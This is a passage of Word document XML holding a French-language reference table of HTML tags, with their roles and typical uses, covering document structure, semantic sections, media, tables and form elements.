        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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Balise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="327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Rôle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="360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Usage typique</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;!doctype html&gt;</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Déclare le mode standard HTML5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Première ligne du document</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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&lt;html lang&gt;</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Racine du document, langue</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lang="fr"</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;head&gt;</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Métadonnées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Titre, encodage, feuilles de style</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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&lt;meta charset&gt;</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Encodage des caractères</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utf-8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> en premier</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;meta name=viewport&gt;</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Adaptation mobile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>width=device-width</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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&lt;title&gt;</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Titre de l'onglet et du résultat de recherche</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Unique par page</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;link rel=stylesheet&gt;</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Feuille de style externe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>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Dans le </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>head</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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&lt;style&gt;</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Styles internes</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Prototypage uniquement</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;script&gt;</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Script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>defer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>type=module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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&lt;body&gt;</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Contenu visible</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Un seul par document</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;header&gt;</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En-tête de page ou de section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Logo, navigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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&lt;nav&gt;</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Navigation principale</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Un ou deux par page</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;main&gt;</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Contenu principal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Un seul, unique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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&lt;article&gt;</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Contenu autonome</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Article, fiche produit</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;section&gt;</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Section thématique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Toujours titrée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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&lt;aside&gt;</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Contenu connexe</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Encadré, note latérale</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;footer&gt;</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Pied de page ou de section</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mentions, liens secondaires</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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&lt;h1&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> à </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;h6&gt;</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Hiérarchie des titres</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Un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>h1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> par page</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;p&gt;</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Paragraphe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Texte courant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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&lt;ul&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;ol&gt;</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Listes non ordonnée / ordonnée</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Navigation, étapes</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;dl&gt;</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Liste de définitions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Glossaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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&lt;a href&gt;</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Lien</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Navigation interne ou externe</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;strong&gt;</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Importance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Alerte, mot clé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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&lt;em&gt;</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Accent d'insistance</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Nuance de sens</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;figure&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;figcaption&gt;</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Illustration et sa légende</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Image, schéma, code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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&lt;img alt&gt;</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Image et texte alternatif</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alt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> obligatoire</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;picture&gt;</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Image responsive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Formats multiples</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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&lt;video&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;audio&gt;</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Média</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controls</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>, sous-titres</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;table&gt;</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Données tabulaires</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Jamais pour la mise en page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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&lt;caption&gt;</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Titre du tableau</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Premier enfant</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;th scope&gt;</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En-tête de cellule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>col</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>row</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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&lt;form&gt;</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Formulaire</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action</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>method</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;label for&gt;</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Étiquette de champ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Toujours associée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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&lt;input type&gt;</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Champ de saisie</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email</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>number</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>date</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>…</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;select&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;option&gt;</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Liste déroulante</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Avec </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>label</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="213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&lt;textarea&gt;</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Zone de texte multiligne</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Message, commentaire</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Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;button type&gt;</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Bouton</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>submit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>button</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
